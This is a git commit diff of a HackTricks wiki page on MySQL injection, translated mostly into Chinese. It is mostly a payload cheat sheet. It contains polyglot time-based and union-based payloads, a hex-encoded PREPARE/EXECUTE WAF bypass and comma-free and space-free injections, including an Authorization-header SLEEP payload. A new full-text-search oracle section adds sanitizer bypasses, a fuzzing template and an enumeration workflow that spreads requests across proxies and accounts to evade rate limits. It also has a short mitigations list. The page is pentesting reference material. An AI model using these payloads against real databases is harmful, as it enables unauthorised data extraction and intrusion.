mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['', 'src/pentesting-web/sql-injection/mysql-injection/README
This commit is contained in:
parent
f110387b51
commit
0f28f42612
@ -1,4 +1,4 @@
|
||||
# MySQL 注入
|
||||
# MySQL injection
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
@ -48,28 +48,28 @@ strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
|
||||
```sql
|
||||
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
|
||||
```
|
||||
从 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
||||
来自 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
|
||||
|
||||
## 流程
|
||||
|
||||
请记住,在“现代”版本的 **MySQL** 中,您可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"**(这可能有助于绕过 WAF)。
|
||||
请记住,在 "现代" 版本的 **MySQL** 中,你可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"** (这可能有助于绕过 WAFs).
|
||||
```sql
|
||||
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
|
||||
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
|
||||
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
|
||||
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
|
||||
```
|
||||
### **仅一个值**
|
||||
### **只有 1 个值**
|
||||
|
||||
- `group_concat()`
|
||||
- `Limit X,1`
|
||||
|
||||
### **盲注逐个**
|
||||
### **Blind one by one**
|
||||
|
||||
- `substr(version(),X,1)='r'` 或 `substring(version(),X,1)=0x70` 或 `ascii(substr(version(),X,1))=112`
|
||||
- `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
|
||||
- `mid(version(),X,1)='5'`
|
||||
|
||||
### **盲注添加**
|
||||
### **Blind adding**
|
||||
|
||||
- `LPAD(version(),1...lenght(version()),'1')='asd'...`
|
||||
- `RPAD(version(),1...lenght(version()),'1')='asd'...`
|
||||
@ -79,7 +79,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
|
||||
|
||||
## 检测列数
|
||||
|
||||
使用简单的 ORDER
|
||||
使用一个简单的 ORDER
|
||||
```
|
||||
order by 1
|
||||
order by 2
|
||||
@ -92,7 +92,7 @@ UniOn SeLect 1,2
|
||||
UniOn SeLect 1,2,3
|
||||
...
|
||||
```
|
||||
## MySQL 联合查询基础
|
||||
## MySQL Union Based
|
||||
```sql
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||
@ -101,67 +101,68 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
```
|
||||
## SSRF
|
||||
|
||||
**在这里了解不同的选项以** [**滥用Mysql注入来获取SSRF**](mysql-ssrf.md)**。**
|
||||
**在这里了解不同的选项来** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
|
||||
|
||||
## WAF绕过技巧
|
||||
## WAF 绕过技巧
|
||||
|
||||
### 通过预处理语句执行查询
|
||||
### 通过 Prepared Statements 执行 queries
|
||||
|
||||
当允许堆叠查询时,可以通过将要执行的查询的十六进制表示分配给一个变量(使用SET),然后使用PREPARE和EXECUTE MySQL语句最终执行查询,从而绕过WAF。类似于这样:
|
||||
当允许 stacked queries 时,可能可以通过将要执行的 query 的 hex representation 赋值给一个变量(使用 SET),然后使用 PREPARE 和 EXECUTE MySQL 语句来最终执行该 query,从而绕过 WAFs。像下面这样:
|
||||
```
|
||||
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
|
||||
```
|
||||
有关更多信息,请参阅 [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce)。
|
||||
欲了解更多信息,请参阅 [这篇博文](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
|
||||
|
||||
### Information_schema 替代方案
|
||||
|
||||
请记住,在“现代”版本的 **MySQL** 中,您可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
|
||||
请记住,在现代版本的 **MySQL** 中,你可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
|
||||
|
||||
### MySQL 注入无逗号
|
||||
### MySQLinjection 不使用逗号
|
||||
|
||||
选择 2 列而不使用任何逗号 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
|
||||
在不使用任何逗号的情况下选择两列 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
|
||||
```
|
||||
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
|
||||
```
|
||||
### 检索没有列名的值
|
||||
### 在不知道列名的情况下检索值
|
||||
|
||||
如果在某个时刻你知道表的名称,但不知道表内列的名称,你可以尝试执行类似的操作来查找有多少列:
|
||||
如果你知道表名但不知道表中列名,可以尝试通过执行类似如下的语句来查找表中有多少列:
|
||||
```bash
|
||||
# When a True is returned, you have found the number of columns
|
||||
select (select "", "") = (SELECT * from demo limit 1); # 2columns
|
||||
select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
|
||||
```
|
||||
假设有两列(第一列是ID,另一列是flag),你可以尝试逐个字符地暴力破解flag的内容:
|
||||
假设有 2 列(第一列为 ID,第二列为 flag),你可以尝试逐字符对 flag 的内容进行 bruteforce:
|
||||
```bash
|
||||
# When True, you found the correct char and can start ruteforcing the next position
|
||||
select (select 1, 'flaf') = (SELECT * from demo limit 1);
|
||||
```
|
||||
更多信息请见 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
|
||||
More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
|
||||
|
||||
### 无空格注入 (`/**/` 注释技巧)
|
||||
### Injection without SPACES (`/**/` comment trick)
|
||||
|
||||
一些应用程序使用 `sscanf("%128s", buf)` 等函数对用户输入进行清理或解析,这些函数 **在第一个空格字符处停止**。因为 MySQL 将序列 `/**/` 视为注释 *和* 空白,所以可以用它来完全去除有效负载中的正常空格,同时保持查询在语法上有效。
|
||||
某些应用使用诸如 `sscanf("%128s", buf)` 的函数对用户输入进行清理或解析,这些函数会**在第一个空格字符处停止**。
|
||||
由于 MySQL 将序列 `/**/` 视为注释 *和* 空白字符,因此它可以用来在保持查询语法有效的同时,完全去除载荷中的普通空格。
|
||||
|
||||
示例:基于时间的盲注入绕过空格过滤:
|
||||
示例 time-based blind injection 用来绕过空格过滤:
|
||||
```http
|
||||
GET /api/fabric/device/status HTTP/1.1
|
||||
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
|
||||
```
|
||||
数据库接收为:
|
||||
数据库接收到的是:
|
||||
```sql
|
||||
' OR SLEEP(5)-- -'
|
||||
```
|
||||
这在以下情况下特别有用:
|
||||
这在以下情况尤其有用:
|
||||
|
||||
* 可控缓冲区的大小受到限制(例如,`%128s`),并且空格会提前终止输入。
|
||||
* 通过 HTTP 头或其他字段注入,其中正常空格被删除或用作分隔符。
|
||||
* 与 `INTO OUTFILE` 原语结合使用,以实现完全的预认证 RCE(请参见 MySQL 文件 RCE 部分)。
|
||||
* 可控缓冲区大小受限(例如 `%128s`),空格会导致输入过早结束。
|
||||
* 通过 HTTP headers 或其他字段进行注入,这些字段会剥离或将普通空格用作分隔符。
|
||||
* 与 `INTO OUTFILE` 原语结合可实现完整的 pre-auth RCE(参见 MySQL File RCE 部分)。
|
||||
|
||||
---
|
||||
|
||||
### MySQL 历史
|
||||
|
||||
您可以在 MySQL 中查看其他执行,读取表:**sys.x$statement_analysis**
|
||||
你可以查看 MySQL 中读取该表的其他执行:**sys.x$statement_analysis**
|
||||
|
||||
### 版本替代**s**
|
||||
```
|
||||
@ -169,14 +170,63 @@ mysql> select @@innodb_version;
|
||||
mysql> select @@version;
|
||||
mysql> select version();
|
||||
```
|
||||
## 其他MYSQL注入指南
|
||||
## MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)
|
||||
|
||||
这不是经典的 SQL 注入。当开发者将用户输入传给 `MATCH(col) AGAINST('...' IN BOOLEAN MODE)` 时,MySQL 会在引号内解析一整套布尔搜索操作符。许多 WAF/SAST 规则只关注打破引号(quote breaking),因此会忽略这一面。
|
||||
|
||||
Key points:
|
||||
- 操作符在引号内被解析: `+` (must include), `-` (must not include), `*` (trailing wildcard), `"..."` (exact phrase), `()` (grouping), `<`/`>`/`~` (weights)。See MySQL docs.
|
||||
- 这允许在不跳出字符串字面量的情况下进行存在/不存在以及前缀测试,例如 `AGAINST('+admin*' IN BOOLEAN MODE)` 用来检测是否存在以 `admin` 开头的任何词。
|
||||
- 可用于构建 oracles,例如 “does any row contain a term with prefix X?” 并通过前缀扩展枚举隐藏字符串。
|
||||
|
||||
Example query built by the backend:
|
||||
```sql
|
||||
SELECT tid, firstpost
|
||||
FROM threads
|
||||
WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);
|
||||
```
|
||||
If the application returns different responses depending on whether the result set is empty (e.g., redirect vs. error message), that behavior becomes a Boolean oracle that can be used to enumerate private data such as hidden/deleted titles.
|
||||
|
||||
Sanitizer bypass patterns (generic):
|
||||
- Boundary-trim preserving wildcard: 如果后端通过类似 `(\b.{1,2})(\s)|(\b.{1,2}$)` 的正则对每个词修剪 1–2 个尾随字符,则提交 `prefix*ZZ`。清理器会修剪掉 `ZZ`,但保留 `*`,因此 `prefix*` 得以保留。
|
||||
- Early-break stripping: 如果代码按每个词去除操作符,但在遇到任意长度 ≥ min length 的 token 时停止处理,就发送两个 token:第一个是满足长度阈值的垃圾 token,第二个携带操作符 payload。例如:`&&&&& +jack*ZZ` → after cleaning: `+&&&&& +jack*`.
|
||||
|
||||
Payload template (URL-encoded):
|
||||
```
|
||||
keywords=%26%26%26%26%26+%2B{FUZZ}*xD
|
||||
```
|
||||
- `%26` 是 `&`,`%2B` 是 `+`。尾随的 `xD`(或任何两个字母)会被 cleaner 修剪,但保留 `{FUZZ}*`。
|
||||
- 将重定向视为 “match”,错误页面视为 “no match”。不要自动跟随重定向,以便保持 oracle 可观测。
|
||||
|
||||
枚举工作流程:
|
||||
1) 从 `{FUZZ} = a…z,0…9` 开始,通过 `+a*`, `+b*`, … 找到首字母匹配。
|
||||
2) 对于每个正向前缀,分支:`a* → aa* / ab* / …`。重复以恢复整个字符串。
|
||||
3) 如果应用实行流量控制,分散请求(proxies、多个账户)。
|
||||
|
||||
为什么标题经常 leak 而内容不会:
|
||||
- 有些应用仅在对标题/主题进行初步 MATCH 之后才应用可见性检查。如果控制流在过滤之前依赖于 “any results?” 的结果,那么会发生存在性 leak。
|
||||
|
||||
缓解措施:
|
||||
- 如果不需要 Boolean 逻辑,使用 `IN NATURAL LANGUAGE MODE`,或将用户输入视为字面值(escape/quote 会在其他模式中禁用运算符)。
|
||||
- 如果需要 Boolean 模式,在分词(tokenization)后对每个 token 剥离或中和所有 Boolean 运算符(`+ - * " ( ) < > ~`)(不要提前中断)。
|
||||
- 在 MATCH 之前应用可见性/授权过滤,或在结果集为空与非空时统一响应(恒定的时延/状态)。
|
||||
- 检查其他 DBMS 中的类似功能:PostgreSQL 的 `to_tsquery`/`websearch_to_tsquery`、SQL Server/Oracle/Db2 的 `CONTAINS` 也会解析带引号参数内部的运算符。
|
||||
|
||||
注意:
|
||||
- Prepared statements 无法防止对 `REGEXP` 或搜索运算符的语义滥用。像 `.*` 这样的输入即使在带引号的 `REGEXP '.*'` 内仍然是一个宽松的正则。使用允许列表 (allow-lists) 或显式保护措施。
|
||||
|
||||
## Other MYSQL injection guides
|
||||
|
||||
- [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
|
||||
|
||||
## 参考文献
|
||||
## 参考资料
|
||||
|
||||
- [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
|
||||
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
|
||||
- [MySQL Full-Text Search – Boolean mode](https://dev.mysql.com/doc/refman/8.4/en/fulltext-boolean.html)
|
||||
- [MySQL Full-Text Search – Overview](https://dev.mysql.com/doc/refman/8.4/en/fulltext-search.html)
|
||||
- [MySQL REGEXP documentation](https://dev.mysql.com/doc/refman/8.4/en/regexp.html)
|
||||
- [ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)](https://exploit.az/posts/wor/)
|
||||
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user